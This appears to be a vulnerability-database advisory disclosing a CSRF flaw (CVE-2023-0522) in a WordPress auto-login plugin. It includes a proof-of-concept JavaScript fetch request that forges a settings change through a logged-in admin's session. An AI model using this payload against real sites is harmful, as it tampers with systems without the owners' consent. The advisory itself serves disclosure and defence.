Enable/Disable Auto Login when Register <= 1.1.0 – Settings Update via CSRF | CVE 2023-0522 | Plugin Vulnerabilities

Description

The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack

Proof of Concept

Disable auto login:

fetch('/wp-admin/options-general.php?page=auto_login_when_register_setting', {
        method: 'POST',
        headers: new Headers({
            'Content-Type': 'application/x-www-form-urlencoded',
        }),
        body: 'alwr_enable_auto_login=false&saved=saved&add_opt_submit=1',
        redirect: 'follow'
    }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));

Affects Plugins

auto-login-when-resister

No known fix

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Lana Codes

Submitter

Lana Codes

Submitter website

https://lana.codes/

Submitter twitter

Verified

Yes

WPVDB ID

c7984bfb-86a3-4530-90ae-17ab39af1c54

Timeline

Publicly Published

2023-04-17 (about 1 years ago)

Added

2023-04-17 (about 1 years ago)

Last Updated

2023-04-17 (about 1 years ago)

Other

Published

Title

Published

2023-08-02

Title

Upload Media By URL < 1.0.8 - Stored XSS via CSRF

Published

2023-06-16

Title

LWS Tools < 2.4.2 - Cross-Site Request Forgery

Published

2014-08-01

Title

Under Construction 1.08 - Setting Manipulation CSRF

Published

2023-07-31

Title

MultiParcels Shipping For WooCommerce < 1.15.2 - Arbitrary Shipment Deletion via CSRF

Published

2023-03-23

Title

GiveWP < 2.25.3 - Cross-Site Request Forgery